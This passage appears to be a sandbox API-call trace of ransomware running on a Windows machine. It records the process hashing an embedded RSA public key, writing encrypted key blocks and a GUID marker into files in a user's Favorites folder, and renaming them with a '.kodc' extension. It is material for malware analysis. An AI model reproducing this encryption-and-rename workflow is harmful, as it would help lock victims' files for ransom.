KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.588] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.589] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.589] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.589] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.589] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.589] GetLastError () returned 0x0 [0101.589] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.589] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.589] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.589] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.589] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.590] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.590] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6088 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb60d0 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.590] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8070 | out: hHeap=0x630000) returned 1 [0101.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8088 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8070 [0101.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8070 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.593] GetCurrentThreadId () returned 0x42c [0101.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8278 [0101.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.594] GetCurrentThreadId () returned 0x42c [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80a0 [0101.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0101.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.600] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.600] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.601] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.601] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.601] CloseHandle (hObject=0x5cc) returned 1 [0101.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0101.602] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.kodc")) returned 1 [0101.604] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0101.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.605] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0101.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.605] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.605] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.612] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.612] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.613] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.613] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.613] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.614] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.615] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.615] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.615] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.615] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.615] GetLastError () returned 0x0 [0101.615] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.615] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.615] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.615] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.616] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.616] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb60d0 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6118 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.617] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80a0 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8088 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: 